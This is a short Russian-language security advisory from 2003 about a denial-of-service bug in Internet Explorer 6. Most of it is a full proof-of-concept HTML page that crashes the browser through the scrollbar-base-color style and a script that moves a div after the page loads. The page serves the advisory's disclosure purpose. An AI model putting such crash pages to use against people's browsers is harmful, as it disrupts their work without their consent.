DoS против Microsoft Internet Explorer
| Дата публикации: | 27.10.2003 |
| Всего просмотров: | 1523 |
| Опасность: | Низкая |
| Наличие исправления: | |
| Количество уязвимостей: | 1 |
| CVE ID: | Нет данных |
| Вектор эксплуатации: | |
| Воздействие: | |
| CWE ID: | Нет данных |
| Наличие эксплоита: | Нет данных |
| Уязвимые продукты: | |
| Уязвимые версии: Microsoft Internet Explorer 6.0 – 6.0sp1
Описание: Уязвимость обнаружена в Microsoft Internet Explorer. Удаленный атакующий может вызвать отказ в обслуживании. Проблема связанна с некорректной обработкой scrollbar-base-color атрибута div объекта. В результате удаленный атакующий может создать Web страницу, содержащую произвольный код сценария, чтобы аварийно завершить работу браузера пользователя, пытающего просмотреть эту Web страницу.
Пример/Эксплоит:
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRASH-IE</title>
<style type="text/css">
html, body {
overflow-y: hidden;
scrollbar-base-color: '#330066';
}
.crash {
position:absolute;
left:200px;
top:200px;
width:200px;
}
</style>
<script type="text/javascript">
function galgenfrist() {
window.setTimeout('crashIE();',1000);
}
function crashIE() {
var moveNode = document.getElementById("move");
if(moveNode) {
moveNode.style.top = "100px";
moveNode.style.left = "200px";
}
}
</script>
</head>
<body onload="galgenfrist();">
<h1>CRASH-IE</h1>
<div id="move" class="crash">
<table>
<tbody>
<tr>
<td>
<textarea></textarea>
</td>
</tr>
</tbody>
</table>
</div>
</body>
</html>
URL производителя:http://www.microsoft.com Решение: Способов устранения обнаруженной уязвимости не существует в настоящее время. |
|
| Ссылки: | IE6 CSS-Crash |